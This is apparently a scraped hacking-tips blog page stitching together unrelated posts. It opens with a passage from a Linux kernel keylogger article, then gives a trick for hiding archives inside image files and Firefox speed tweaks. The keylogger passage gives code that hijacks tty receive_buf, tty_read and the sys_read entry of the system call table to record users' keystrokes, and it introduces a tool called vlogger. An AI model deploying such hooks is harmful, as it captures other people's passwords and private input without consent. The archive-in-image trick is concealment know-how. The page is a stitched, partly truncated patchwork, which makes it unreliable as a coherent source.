int (*receive_room)(struct tty_struct *);
void (*write_wakeup)(struct tty_struct *);
};

To intercept this function, we can save the original tty receive_buf()
function then set ldisc.receive_buf to our own new_receive_buf() function
in order to logging user inputs.

Ex: to log inputs on the tty0

int fd = open("/dev/tty0", O_RDONLY, 0);
struct file *file = fget(fd);
struct tty_struct *tty = file->private_data;
old_receive_buf = tty->ldisc.receive_buf;
tty->ldisc.receive_buf = new_receive_buf;

void new_receive_buf(struct tty_struct *tty, const unsigned char *cp,
char *fp, int count)
{
logging(tty, cp, count); //log inputs

/* call the original receive_buf */
(*old_receive_buf)(tty, cp, fp, count);
}


------[ 3.2.4 - tty_read

This function is called when a process wants to read input characters
from a tty via sys_read() function.

# /usr/src/linux/drives/char/tty_io.c
static ssize_t tty_read(struct file * file, char * buf, size_t count,
loff_t *ppos)

static struct file_operations tty_fops = {
llseek: tty_lseek,
read: tty_read,
write: tty_write,
poll: tty_poll,
ioctl: tty_ioctl,
open: tty_open,
release: tty_release,
fasync: tty_fasync,
};

To log inputs on the tty0:

int fd = open("/dev/tty0", O_RDONLY, 0);
struct file *file = fget(fd);
old_tty_read = file->f_op->read;
file->f_op->read = new_tty_read;


------[ 3.2.5 - sys_read/sys_write

We will intercept sys_read/sys_write system calls to redirect it to our
own code which logs the content of the read/write calls. This method was
presented by halflife in Phrack 50 (see [4]). I highly recommend reading
that paper and a great article written by pragmatic called "Complete Linux
Loadable Kernel Modules" (see [2]).

The code to intercept sys_read/sys_write will be something like this:

extern void *sys_call_table[];
original_sys_read = sys_call_table[__NR_read];
sys_call_table[__NR_read] = new_sys_read;


--[ 4 - vlogger

This part will introduce my kernel keylogger which is used method
described in section 3.2.3 to acquire more abilities than common keyloggers
used sys_read/sys_write systemcall replacement approach. I have tested the
code with the following versions of linux kernel: 2.4.5, 2.4.7, 2.4.17 and
2.4.18.
Get Free Updates:
*Please click on the confirmation link sent in your Spam folder of Email*
read more

How to Hide a RAR File in JPG File !

First you need to have a rar file and a jpg image to hide the rar
Say the jpg is “image.jpg” and the rar is “file.rar”

Go to Windows command prompt (Start>Run>type cmd and press enter)

Now type this command:
copy /b image.jpg + file.rar newfile.jpg

switch “/b” indicates the copy function is binary
“newfile.jpg” is the resulting image with the rar file embedded (you can use a name of your choice)

That’s all

When you click on newfile.jpg the image will be displayed. Now it you change the jpg extension to rar (ie: newfile.rar) and open it with WinRAR the contents of the embedded rar file will be displayed.

The jpg can be replaced with a bmp,png,gif or swf file. The rar archive can be replaced with zip,tar.gz/bz2 or 7z archive. Actually in theory you can use any image format and any archive.

Here are some sample commands:
copy /b image.bmp + file.zip newfile.jpg
copy /b image.gif + file.7z newfile.jpg
copy /b image.png + file.tar.gz newfile.jpg
copy /b image.swf + file.rar newfile.jpg
Get Free Updates:
*Please click on the confirmation link sent in your Spam folder of Email*
read more

Speeding Up Mozilla Firefox

We are getting here to the hidden configuration settings to set the firefox to request more data that it usually does!

* Type "about:config" into the Address Bar and hit ENTER.

* Scroll down and look for the following entries:
1) network.http.pipelining.
2) network.http.proxy.pipelining.
3) network.http.pipelining.maxrequests.

* Normally, the browser will make one request to a web page at a time, when you enable pipelining it will make several at once, which really speeds up page loading.

* Alter the entries as follows:
1) Set "network.http.pipelining" to "true"
2) Set "network.http.proxy.pipelining" to "true"
3) Set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once.

* Lastly, right-click anywhere and select "New"--> "Integer".

* Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it receives.

Please do all this very carefully!
WRITTEN BY GodFather Blu3StR3aK
Get Free Updates:
*Please click on the confirmation link sent in your Spam folder of Email*
read more

Related Posts Plugin for WordPress, Blogger...
Back to TOP